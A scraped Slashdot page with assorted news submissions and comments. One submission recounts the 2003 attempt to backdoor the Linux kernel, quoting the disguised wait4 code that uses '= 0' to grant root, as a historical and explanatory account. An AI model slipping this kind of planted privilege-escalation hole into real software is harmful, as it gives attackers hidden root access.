Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×

Submission + - The Linux Backdoor Attempt of 2003

Hugh Pickens DOT Com writes: Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. On November 5, 2003, Larry McAvoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in electronically to the CVS server and inserted this change.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0” so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it’s a classic backdoor. We don’t know who it was that made the attempt—and we probably never will. But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. "Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack," writes Felton. "Unless somebody confesses, or a smoking-gun document turns up, we’ll never know."

Submission + - Is LinkedIn Creating Phantom Profiles For Children? (itworld.com)

jfruh writes: LinkedIn is, according to its terms of service, only for adults. So how did the 12-year-old granddaughter of a friend of tech blogger Dan Tynan end up with a skeletal LinkedIn profile she had no memory of creating? Tynan tried to figure out how such "phantom profiles" can get created, and concluded that it has a lot to do with the very aggressive way LinkedIn will try to extract new customers from the contact lists of users who grant the company access.

Submission + - Deutsche Telekom Moves Email Traffic In-Country in Wake of PRISM (reuters.com)

kdryer39 writes: Germany's leading telecom provider has announced on Friday that it will only being using German servers to handle any email traffic over it's systems, citing privacy concerns arising from the recent PRISM leak and it's 'public outrage over U.S. spy programs accessing citizens' private messages.' In a related move, DT has also announced that they will be providing email services over SSL to further secure their customers' communications.

Sandro Gaycken, a professor of cyber security at Berlin's Free University, said 'This will make a big difference...Of course the NSA could still break in if they wanted to, but the mass encryption of emails would make it harder and more expensive for them to do so.'

Comment Re:3% velocity (Score 1) 285

Even so, a sharp projectile hitting your at 23MPH still isn't something to laugh at as the grandparent attempts to do.

23 MPH is about 10 meters per second. So this is about the same as a nail rolling off the roof and hitting your shoe as you walked by.

I think I could laugh at that.

Submission + - How to Grow a New Head (sciencemag.org)

sciencehabit writes: Cut most species of flatworm in half, and you end up with two flatworms. The front half will grow a new tail and, more impressively, the back half will grow a new head—complete with a fully functioning brain. But a few species of these worms mysteriously lack this ability, at least when it comes to regrowing a head. Now, three teams of researchers have not only zeroed in on the biological reason for this limitation, they've also managed to restore the worms' full regenerative abilities by manipulating a single genetic pathway, reversing a million years of evolution with a single genetic switch.

Comment Re:Theocracies (Score 1) 862

even the otherwise very conservative Catholic church has no problem with evolution or the big bang.

Indeed. The so-called Big Bang theory was the work of a Catholic Priest, Monseigneur Georges Lemaitre. In response he was elected as member of the Pontifical Academy of Sciences, eventually becoming its president.

Comment What's new? (Score 5, Insightful) 234

I've worked for big companies, and for startups. I have to say that on-campus dining facilities are pretty standard for big companies. We normally call them "cafeterias" but if you want to call it a restaurant knock yourself out.

Not to mention that Google's in-house chefs are a thing of legend. I really don't see what's news here.

Comment Re:And the geek shall inherit the earth... (Score 2) 237

It's nice to see real Engineers getting a bit of recognition for a change.

On Slashdot.

No. In the Seattle Times. Like most stories on /., this is just a summary of an article that appears elsewhere. This is why you sometimes see people saying "RTFA" or "Didn't RTFA". These are hints that a poster who wishes to be knowledgeable about the thing that they're commenting on would actually read the fine article and not just the summary.

Comment Re:Qt (Score 2) 90

How do you pronounce a name like that?

I hate to feed a troll, but there's three schools of thought here:

  1. Cue-Tee
  2. Cutie
  3. Cute

Comment Re:huh (Score 1) 212

If it's that important, why not just have uniforms?

In a way, they do have uniforms. The uniform is the method of dress spelled out in the dress code.Their uniform just has more variation allowed.

But what would uniforms save? You still need to tell people how to wear them. The US Air Force spends about 160 pages (annoying PDF) telling people how to wear theirs.

Comment Re:mind blowing? (Score 1) 465

Ok, let's get one thing straight -- the Cylons "evolving" into human form was not "mind blowing". It just wasn't.

Agreed. it wasn't even new to the Galactica canon. We first see human looking cylons in "The Night the Cyclons Landed" two-parter (aka "the halloween episode" with a special Wolfman Jack appearance) of Galactica 1980.

Slashdot Top Deals

UNIX was not designed to stop you from doing stupid things, because that would also stop you from doing clever things. -- Doug Gwyn

Working...